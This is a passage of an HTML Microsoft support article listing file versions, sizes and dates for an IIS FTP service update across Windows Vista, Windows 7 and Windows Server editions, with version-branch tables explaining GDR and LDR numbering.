perform certain operations on the files.<br/><h3 class=\"sbody-h3\">Windows Vista and Windows Server 2008 file information</h3><ul class=\"sbody-free_list\"><li>The files that apply to a specific product, milestone (RTM, SP<strong class=\"sbody-strong\">n</strong>), and service branch (LDR, GDR) can be identified by examining the file version numbers as shown in the following table:<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Version</span></td><td class=\"sbody-td\"><span class=\"text-base\">Product</span></td><td class=\"sbody-td\"><span class=\"text-base\">Milestone</span></td><td class=\"sbody-td\"><span class=\"text-base\">Service branch</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">0</span>. <span class=\"text-base\">16</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">0</span>. <span class=\"text-base\">20</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">LDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">1</span>. <span class=\"text-base\">18</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista SP1 and Windows Server 2008 SP1</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">1</span>. <span class=\"text-base\">22</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista SP1 and Windows Server 2008 SP1</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">LDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">2</span>. <span class=\"text-base\">18</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista SP2 and Windows Server 2008 SP2</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">2</span>. <span class=\"text-base\">22</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista SP2 and Windows Server 2008 SP2</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">LDR</td></tr></table></div></li><li>Service Pack 1 is integrated into the release version of Windows Server 2008. Therefore, RTM milestone files apply only to Windows Vista. RTM milestone files have a 6.0.0000. <strong class=\"sbody-strong\">xxxxxx</strong> version number. </li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. LDR service branches contain hotfixes in addition to widely released fixes. </li><li>The MANIFEST files (.manifest) and the MUM files (.mum) that are installed for each environment are <a bookmark-id=\"manifests\" href=\"#manifests\" managed-link=\"\" target=\"\">listed separately</a>. MUM and MANIFEST files, and the associated security catalog (.cat) files, are critical to maintaining the state of the updated component. The security catalog files (attributes not listed) are signed with a Microsoft digital signature. </li></ul><h3 class=\"sbody-h3\"> FTP Service 7.5 for IIS 7.0 version 7.5.7056.14445 for Windows Vista and Windows Server 2008</h3><h4 class=\"sbody-h4\">For all supported x64-based versions of Windows Vista and of Windows Server 2008 with FTP 7.5 installed</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.dll</td><td class=\"sbody-td\">7.5.7600.14978</td><td class=\"sbody-td\">419,592</td><td class=\"sbody-td\">07-Jan-2011</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x64</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows Vista and of Windows Server 2008 with FTP 7.5 installed</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.dll</td><td class=\"sbody-td\">7.5.7600.14978</td><td class=\"sbody-td\">332,040</td><td class=\"sbody-td\">07-Jan-2011</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr></table></div><h3 class=\"sbody-h3\">FTP Service 7.5 for IIS 7.0 version 7.5.7055.14307 for Windows Vista and Windows Server 2008</h3><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows Vista with FTP 7.5 installed</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.dll</td><td class=\"sbody-td\">7.5.7055.14310</td><td class=\"sbody-td\">332,040</td><td class=\"sbody-td\">27-Jan-2011</td><td class=\"sbody-td\">23:49</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x64-based versions of Windows Vista with FTP 7.5 installed</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.dll</td><td class=\"sbody-td\">7.5.7055.14310</td><td class=\"sbody-td\">419,592</td><td class=\"sbody-td\">27-Jan-2011</td><td class=\"sbody-td\">23:49</td><td class=\"sbody-td\">x64</td></tr></table></div><h3 class=\"sbody-h3\">IIS FTP 7.0 for Windows Vista and Windows Server 2008</h3><h4 class=\"sbody-h4\">For all supported x64-based versions of Windows Vista and of Windows Server 2008 with FTP 7.0 installed</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.dll</td><td class=\"sbody-td\">7.0.6545.14979</td><td class=\"sbody-td\">413,448</td><td class=\"sbody-td\">07-Jan-2011</td><td class=\"sbody-td\">10:16</td><td class=\"sbody-td\">x64</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows Vista and of Windows Server 2008 with FTP 7.0 installed</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.dll</td><td class=\"sbody-td\">7.0.6545.14979</td><td class=\"sbody-td\">328,456</td><td class=\"sbody-td\">07-Jan-2011</td><td class=\"sbody-td\">10:16</td><td class=\"sbody-td\">x86</td></tr></table></div><h3 class=\"sbody-h3\">Windows 7 and Windows Server 2008 R2 file information</h3><ul class=\"sbody-free_list\"><li>The files that apply to a specific product, milestone (RTM, SP<strong class=\"sbody-strong\">n</strong>), and service branch (LDR, GDR) can be identified by examining the file version numbers as shown in the following table: <br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Version</span></td><td class=\"sbody-td\"><span class=\"text-base\">Product</span></td><td class=\"sbody-td\"><span class=\"text-base\">Milestone</span></td><td class=\"sbody-td\"><span class=\"text-base\">Service branch</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.1.760<span class=\"text-base\">0</span>. <span class=\"text-base\">16</span>xxx</td><td class=\"sbody-td\">Windows 7 and Windows Server 2008 R2</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.1.760<span class=\"text-base\">0</span>. <span class=\"text-base\">20</span>xxx</td><td class=\"sbody-td\">Windows 7 and Windows Server 2008 R2</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">LDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.1.760<span class=\"text-base\">0</span>. <span class=\"text-base\">17</span>xxx</td><td class=\"sbody-td\">Windows 7 and Windows Server 2008 R2</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.1.760<span class=\"text-base\">0</span>. <span class=\"text-base\">21</span>xxx</td><td class=\"sbody-td\">Windows 7 and Windows Server 2008 R2</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">LDR</td></tr></table></div></li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. LDR service branches contain hotfixes in addition to widely released fixes. </li><li>The MANIFEST files (.manifest) and the MUM files (.mum) that are installed for each environment are <a bookmark-id=\"manifests7\" href=\"#manifests7\" managed-link=\"\" target=\"\">listed separately</a> in the \"Additional file information for Windows 7 and Windows Server 2008 R2\" section. MUM and MANIFEST files, and the associated security catalog (.cat) files, are critical to maintaining the state of the updated component. The security catalog files, for which the attributes are not listed, are signed with a Microsoft digital signature. </li></ul><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows 7</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpconfigext.dll</td><td class=\"sbody-td\">7.5.7600.16748</td><td class=\"sbody-td\">16,384</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">06:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpctrlps.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">9,728</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:15</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpmib.dll</td><td class=\"sbody-td\">7.5.7600.16385</td><td class=\"sbody-td\">10,240</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:15</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpres.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">14,848</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.dll</td><td class=\"sbody-td\">7.5.7600.16748</td><td class=\"sbody-td\">308,224</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">06:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">69,252</td><td class=\"sbody-td\">13-Jul-2009</td><td class=\"sbody-td\">21:05</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpconfigext.dll</td><td class=\"sbody-td\">7.5.7600.20888</td><td class=\"sbody-td\">16,384</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">05:54</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpctrlps.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">9,728</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:15</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpmib.dll</td><td class=\"sbody-td\">7.5.7600.16385</td><td class=\"sbody-td\">10,240</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:15</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpres.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">14,848</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.dll</td><td class=\"sbody-td\">7.5.7600.20888</td><td class=\"sbody-td\">309,248</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">05:54</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">69,252</td><td class=\"sbody-td\">13-Jul-2009</td><td class=\"sbody-td\">21:05</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpconfigext.dll</td><td class=\"sbody-td\">7.5.7601.17550</td><td class=\"sbody-td\">16,384</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">06:06</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpctrlps.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">9,728</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:15</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpmib.dll</td><td class=\"sbody-td\">7.5.7600.16385</td><td class=\"sbody-td\">10,240</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:15</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpres.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">14,848</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.dll</td><td class=\"sbody-td\">7.5.7601.17550</td><td class=\"sbody-td\">309,760</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">06:06</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">69,252</td><td class=\"sbody-td\">13-Jul-2009</td><td class=\"sbody-td\">21:05</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpconfigext.dll</td><td class=\"sbody-td\">7.5.7601.21649</td><td class=\"sbody-td\">16,384</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">05:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpctrlps.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">9,728</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:15</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpmib.dll</td><td class=\"sbody-td\">7.5.7600.16385</td><td class=\"sbody-td\">10,240</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:15</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpres.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">14,848</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.dll</td><td class=\"sbody-td\">7.5.7601.21649</td><td class=\"sbody-td\">309,760</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">05:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">69,252</td><td class=\"sbody-td\">13-Jul-2009</td><td class=\"sbody-td\">21:05</td><td class=\"sbody-td\">Not Applicable</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x64-based versions of Windows 7 and of Windows Server 2008 R2</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpconfigext.dll</td><td class=\"sbody-td\">7.5.7600.16748</td><td class=\"sbody-td\">18,432</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">06:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpctrlps.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">13,824</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:40</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpmib.dll</td><td class=\"sbody-td\">7.5.7600.16385</td><td class=\"sbody-td\">12,800</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:40</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpres.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">14,848</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:27</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.dll</td><td class=\"sbody-td\">7.5.7600.16748</td><td class=\"sbody-td\">349,184</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">06:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">69,252</td><td class=\"sbody-td\">13-Jul-2009</td><td class=\"sbody-td\">20:50</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpconfigext.dll</td><td class=\"sbody-td\">7.5.7600.20888</td><td class=\"sbody-td\">18,432</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">06:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpctrlps.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">13,824</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:40</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpmib.dll</td><td class=\"sbody-td\">7.5.7600.16385</td><td class=\"sbody-td\">12,800</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:40</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpres.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">14,848</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:27</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.dll</td><td class=\"sbody-td\">7.5.7600.20888</td><td class=\"sbody-td\">349,696</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">06:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">69,252</td><td class=\"sbody-td\">13-Jul-2009</td><td class=\"sbody-td\">20:50</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpconfigext.dll</td><td class=\"sbody-td\">7.5.7601.17550</td><td class=\"sbody-td\">18,432</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">11:38</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpctrlps.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">13,824</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:40</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpmib.dll</td><td class=\"sbody-td\">7.5.7600.16385</td><td class=\"sbody-td\">12,800</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:40</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpres.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">14,848</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:27</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.dll</td><td class=\"sbody-td\">7.5.7601.17550</td><td class=\"sbody-td\">350,720</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">11:38</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">69,252</td><td class=\"sbody-td\">13-Jul-2009</td><td class=\"sbody-td\">20:50</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpconfigext.dll</td><td class=\"sbody-td\">7.5.7601.21649</td><td class=\"sbody-td\">18,432</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">06:42</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpctrlps.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">13,824</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:40</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpmib.dll</td><td class=\"sbody-td\">7.5.7600.16385</td><td class=\"sbody-td\">12,800</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:40</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpres.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">14,848</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:27</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.dll</td><td class=\"sbody-td\">7.5.7601.21649</td><td class=\"sbody-td\">350,720</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">06:42</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">69,252</td><td class=\"sbody-td\">13-Jul-2009</td><td class=\"sbody-td\">20:50</td><td class=\"sbody-td\">Not Applicable</td></tr></table></div><h4 class=\"sbody-h4\">For all supported IA-64-based versions of Windows Server 2008 R2</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpconfigext.dll</td><td class=\"sbody-td\">7.5.7600.16748</td><td class=\"sbody-td\">40,960</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">05:40</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpctrlps.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">22,528</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:46</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpmib.dll</td><td class=\"sbody-td\">7.5.7600.16385</td><td class=\"sbody-td\">23,552</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:46</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpres.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">14,848</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:35</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.dll</td><td class=\"sbody-td\">7.5.7600.16748</td><td class=\"sbody-td\">779,776</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">05:40</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">69,252</td><td class=\"sbody-td\">13-Jul-2009</td><td class=\"sbody-td\">20:48</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpconfigext.dll</td><td class=\"sbody-td\">7.5.7600.20888</td><td class=\"sbody-td\">40,960</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">05:38</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpctrlps.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">22,528</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:46</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpmib.dll</td><td class=\"sbody-td\">7.5.7600.16385</td><td class=\"sbody-td\">23,552</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:46</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpres.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">14,848</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:35</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.dll</td><td class=\"sbody-td\">7.5.7600.20888</td><td class=\"sbody-td\">781,312</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">05:38</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">69,252</td><td class=\"sbody-td\">13-Jul-2009</td><td class=\"sbody-td\">20:48</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpconfigext.dll</td><td class=\"sbody-td\">7.5.7601.17550</td><td class=\"sbody-td\">40,960</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">05:26</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpctrlps.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">22,528</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:46</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpmib.dll</td><td class=\"sbody-td\">7.5.7600.16385</td><td class=\"sbody-td\">23,552</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:46</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpres.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">14,848</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:35</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.dll</td><td class=\"sbody-td\">7.5.7601.17550</td><td class=\"sbody-td\">784,384</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">05:26</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">69,252</td><td 